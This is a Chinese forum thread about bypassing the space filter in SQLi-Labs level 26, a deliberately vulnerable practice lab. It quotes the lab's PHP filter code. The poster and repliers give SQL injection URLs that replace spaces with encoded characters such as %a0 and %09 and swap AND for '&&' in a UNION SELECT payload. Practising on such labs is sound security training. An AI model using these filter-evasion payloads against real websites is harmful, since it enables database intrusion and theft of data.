关于SQLi-Labs在第26关 空格过滤的问题

「已注销」 2017-05-23 02:46:53
过滤代码:
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes

平台win7,mysql5.7.10
SQL语句:SELECT * FROM users WHERE id='$id' LIMIT 0,1
URL:http://localhost/sqli-labs-master/Less-26/?id=-1%27%09union%09select%091,2,3||%271

过滤方法(都不行):
%09 TAB键(水平)
%0a 新建一行
%0c 新的一页
%0d return功能
%0b TAB键(垂直)
%a0 空格
/**/
+
()

以上过滤方法都试过了还是不行,没有效果,如图


在线等。。
...全文
1012 6 打赏 收藏 转发到动态 举报
写回复
用AI写文章
6 条回复
切换为时间正序
请发表友善的回复…
发表回复
tnt阿信 2018-05-28
  • 打赏
  • 举报
 回复
%a0可以绕过的
IMrekcah 2017-10-19
  • 打赏
  • 举报
 回复
比如注入: id=0%27union%a0select%a01,2,3%a0%26%26%a0%271%27=%271
IMrekcah 2017-10-19
  • 打赏
  • 举报
 回复
使用宽字节绕过,用%a0代替空格注入
LongRui888 2017-05-24
  • 打赏
  • 举报
 回复
引用 2 楼 SmithJackHack 的回复:
[quote=引用 1 楼 yupeigu 的回复:] 没看懂你的问题是什么。。。
就是如何绕过空格过滤,以上的方法我都试过,都没效果[/quote] sql注入?
「已注销」 2017-05-24
  • 打赏
  • 举报
 回复
引用 1 楼 yupeigu 的回复:
没看懂你的问题是什么。。。
就是如何绕过空格过滤,以上的方法我都试过,都没效果
LongRui888 2017-05-24
  • 打赏
  • 举报
 回复
没看懂你的问题是什么。。。
详细sqli-labs(1-65)通讲解
如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入...
sqli-labs/Less-26
sqli-labs第二十六
sqli-labs第二十六二十六a
sqli-labs第二十六二十六a
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析 详细,超级详细
sqli-labs-php7环境搭建及通记录
学了一个星期的sql注入,将学习过程记录在博客,以后可以查看。 学习视频来自b站的up主:crowsec 视频链接:https://space.bilibili.com/29903122 sqli-labs-php7链接:...
MySQL

56,687

社区成员

56,710

社区内容

发帖
与我相关
我的任务
社区描述
MySQL相关内容讨论专区
社区管理员
  • MySQL
加入社区
  • 近7日
  • 近30日
  • 至今

加载中

查看更多榜单
社区公告
暂无公告

试试用AI创作助手写篇文章吧

+ 用AI写文章